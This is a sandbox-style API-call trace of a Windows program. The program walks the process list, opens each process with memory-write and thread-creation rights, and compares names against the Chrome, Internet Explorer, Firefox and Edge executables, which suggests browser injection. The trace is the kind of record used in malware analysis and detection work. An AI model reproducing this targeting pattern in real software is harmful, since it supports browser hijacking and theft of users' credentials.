	[0246.145] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0246.147] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0246.149] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0246.151] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x94a0
	[0246.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.152] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.153] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.154] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.154] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.154] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.155] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x94a4
	[0246.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.155] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.156] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.156] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.156] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.156] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0246.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x94a8
	[0246.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.158] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0246.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.158] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.158] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0246.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.159] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.159] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.160] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x94ac
	[0246.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.160] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.160] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.160] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.161] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.161] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0246.162] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x94b0
	[0246.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.162] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0246.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.162] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.163] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0246.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.163] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.163] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0246.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x94b4
	[0246.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.164] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0246.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.164] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.165] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0246.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.165] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.165] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0246.166] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x94b8
	[0246.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.166] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0246.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.166] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.167] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0246.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.167] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.167] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0246.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x94bc
	[0246.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.168] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0246.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.184] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.184] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0246.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.185] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x94c0
	[0246.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.186] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.186] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.187] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.187] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.187] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x94c4
	[0246.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.188] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.188] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.189] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.189] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x94c8
	[0246.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.190] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.191] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.191] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.191] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.191] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x94cc
	[0246.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.192] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.193] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.193] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.193] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x94d0
	[0246.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.194] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.195] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.195] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.195] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.196] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x94d4
	[0246.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.197] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.197] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.197] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.198] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.198] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x94d8
	[0246.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.199] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.199] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.201] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.201] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0246.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x94dc
	[0246.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.203] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0246.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.203] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.203] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0246.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.204] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x94e0
	[0246.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.205] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.205] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.206] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.206] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0246.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x94e4
	[0246.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.207] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.207] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.208] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.208] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x94e8
	[0246.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.209] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0246.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.209] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.210] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0246.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.210] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x94ec
	[0246.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.211] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.211] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.212] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.212] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.212] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.213] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x94f0
	[0246.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.213] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0246.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.213] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.214] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0246.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.214] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.214] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0246.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x94f4
	[0246.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.216] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0246.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.216] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.217] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0246.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.217] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.217] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0246.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x94f8
	[0246.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.218] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0246.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.219] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.219] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0246.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.219] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.219] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0246.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x94fc
	[0246.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.220] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0246.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.221] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.221] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0246.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.221] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.221] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0246.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
